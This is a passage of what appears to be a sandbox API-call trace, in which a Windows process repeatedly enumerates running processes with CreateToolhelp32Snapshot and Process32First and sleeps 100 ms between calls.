th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0292.870] Process32Next (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0292.923] Sleep (dwMilliseconds=0x64) [0292.924] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0292.937] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.012] Sleep (dwMilliseconds=0x64) [0293.013] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0293.028] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.172] Sleep (dwMilliseconds=0x64) [0293.173] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0293.189] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.295] Sleep (dwMilliseconds=0x64) [0293.299] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0293.314] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.385] Sleep (dwMilliseconds=0x64) [0293.387] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0293.400] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.495] Sleep (dwMilliseconds=0x64) [0293.497] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0293.517] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.609] Sleep (dwMilliseconds=0x64) [0293.612] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0293.625] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.726] Sleep (dwMilliseconds=0x64) [0293.729] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0293.762] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.859] Sleep (dwMilliseconds=0x64) [0293.861] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0293.881] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.956] Sleep (dwMilliseconds=0x64) [0293.959] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0293.974] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.051] Sleep (dwMilliseconds=0x64) [0294.053] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0294.075] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.165] Sleep (dwMilliseconds=0x64) [0294.167] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0294.185] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.288] Sleep (dwMilliseconds=0x64) [0294.290] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0294.305] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.381] Sleep (dwMilliseconds=0x64) [0294.382] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0294.395] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.466] Sleep (dwMilliseconds=0x64) [0294.468] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0294.483] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.554] Sleep (dwMilliseconds=0x64) [0294.556] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0294.570] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.675] Sleep (dwMilliseconds=0x64) [0294.678] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0294.694] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.771] Sleep (dwMilliseconds=0x64) [0294.773] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0294.792] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.866] Sleep (dwMilliseconds=0x64) [0294.868] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0294.881] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.963] Sleep (dwMilliseconds=0x64) [0294.965] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0294.979] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.167] Sleep (dwMilliseconds=0x64) [0295.169] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0295.182] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.297] Sleep (dwMilliseconds=0x64) [0295.299] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0295.320] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.416] Sleep (dwMilliseconds=0x64) [0295.417] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0295.435] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.529] Sleep (dwMilliseconds=0x64) [0295.531] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0295.549] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.631] Sleep (dwMilliseconds=0x64) [0295.632] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0295.644] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.714] Sleep (dwMilliseconds=0x64) [0295.715] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0295.732] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.821] Sleep (dwMilliseconds=0x64) [0295.823] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0295.837] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.914] Sleep (dwMilliseconds=0x64) [0295.916] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0295.934] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.023] Sleep (dwMilliseconds=0x64) [0296.025] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0296.040] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.135] Sleep (dwMilliseconds=0x64) [0296.137] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0296.154] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.295] Sleep (dwMilliseconds=0x64) [0296.298] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0296.313] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.396] Sleep (dwMilliseconds=0x64) [0296.398] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0296.412] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.493] Sleep (dwMilliseconds=0x64) [0296.496] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0296.514] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.602] Sleep (dwMilliseconds=0x64) [0296.605] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0296.620] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.705] Sleep (dwMilliseconds=0x64) [0296.706] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0296.718] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.804] Sleep (dwMilliseconds=0x64) [0296.806] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0296.823] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.909] Sleep (dwMilliseconds=0x64) [0296.911] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0296.926] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.013] Sleep (dwMilliseconds=0x64) [0297.016] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0297.031] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.122] Sleep (dwMilliseconds=0x64) [0297.123] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0297.143] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.249] Sleep (dwMilliseconds=0x64) [0297.251] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0297.267] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.352] Sleep (dwMilliseconds=0x64) [0297.353] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0297.385] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.476] Sleep (dwMilliseconds=0x64) [0297.479] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0297.495] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.562] Sleep (dwMilliseconds=0x64) [0297.563] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0297.577] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.647] Sleep (dwMilliseconds=0x64) [0297.649] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0297.667] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.740] Sleep (dwMilliseconds=0x64) [0297.742] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0297.756] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.828] Sleep (dwMilliseconds=0x64) [0297.829] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0297.858] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.932] Sleep (dwMilliseconds=0x64) [0297.934] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0297.951] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.050] Sleep (dwMilliseconds=0x64) [0298.066] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0298.079] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.152] Sleep (dwMilliseconds=0x64) [0298.157] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0298.175] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.269] Sleep (dwMilliseconds=0x64) [0298.270] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0298.283] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.354] Sleep (dwMilliseconds=0x64) [0298.356] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0298.369] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.458] Sleep (dwMilliseconds=0x64) [0298.459] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0298.476] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.563] Sleep (dwMilliseconds=0x64) [0298.567] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0298.583] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.662] Sleep (dwMilliseconds=0x64) [0298.664] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0298.678] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.750] Sleep (dwMilliseconds=0x64) [0298.752] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0298.763] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.839] Sleep (dwMilliseconds=0x64) [0298.841] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0298.853] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.924] Sleep (dwMilliseconds=0x64) [0298.926] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0298.942] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.010] Sleep (dwMilliseconds=0x64) [0299.011] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0299.030] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.120] Sleep (dwMilliseconds=0x64) [0299.142] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0299.158] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.256] Sleep (dwMilliseconds=0x64) [0299.258] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140c [0299.271] Process32First (in: hSnapshot=0x140c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, 